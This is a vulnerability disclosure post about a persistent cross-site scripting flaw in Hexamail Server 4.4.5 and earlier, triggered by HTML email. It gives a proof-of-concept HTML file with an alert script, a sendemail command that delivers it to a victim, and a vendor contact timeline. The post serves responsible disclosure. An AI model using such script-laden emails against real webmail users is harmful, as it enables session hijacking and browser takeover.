Hexamail Server <= 4.4.5 Persistent XSS Vulnerability

Hexamail Server version 4.4.5 or below is vulnerable to a persistent cross-site scripting (XSS) via HTML email.

Vulnerability Description

Hexamail Server suffers from a persistent XSS vulnerability in the mail body, allowing a malicious user to execute scripts in a victim's browser in order to hijack user sessions, redirect users, or hijack the user's browser.

Proof of concept

By sending a malicious script in an email to the victim, the webmail client automatically loads the mail body, so the script is executed without any action or consent from the user.

root@bt:~/# cat > meal.txt
<html>
<body>
<h1>XSS pop up</h1>
<script>alert('Hi, what is this?');</script>
</body>
</html>
root@bt:~/#

Send email to the victim:

root@bt:~/# sendemail -f [email protected] -t [email protected] -xu [email protected] -xp bob123 -u "Want some meal..?" -o message-file=meal.txt -s mail.example.com

Vendor timeline

04/20/2012 – Issue discovered
04/20/2012 – Vendor contacted
04/27/2012 – Vendor responds and provides a new upgrade version
04/30/2012 – Issue still present in the latest upgrade version
04/30/2012 – Vendor says they are still fixing the problem
05/10/2012 – Email sent asking about the progress of the fix
06/02/2012 – No response. Sent to Secunia.

Solution

Not available.

modpr0be

My current position is director and owner of PT Spentera, a company focused on penetration testing, incident response, intrusion analysis and forensic investigation.

I also contribute to the Metasploit Framework exploit repository as an exploit developer. I currently hold certifications as Offensive Security Certified Professional (OSCP), Offensive Security Certified Expert (OSCE), ISO/IEC ISMS 27001:2013 Lead Auditor/Auditor, GIAC Certified Intrusion Analyst (GCIA), and Offensive Security Exploitation Expert (OSEE).

If you want to contact me, you can reach me by business email at tom at spentera dot id or personally at me at modpr0 dot be.
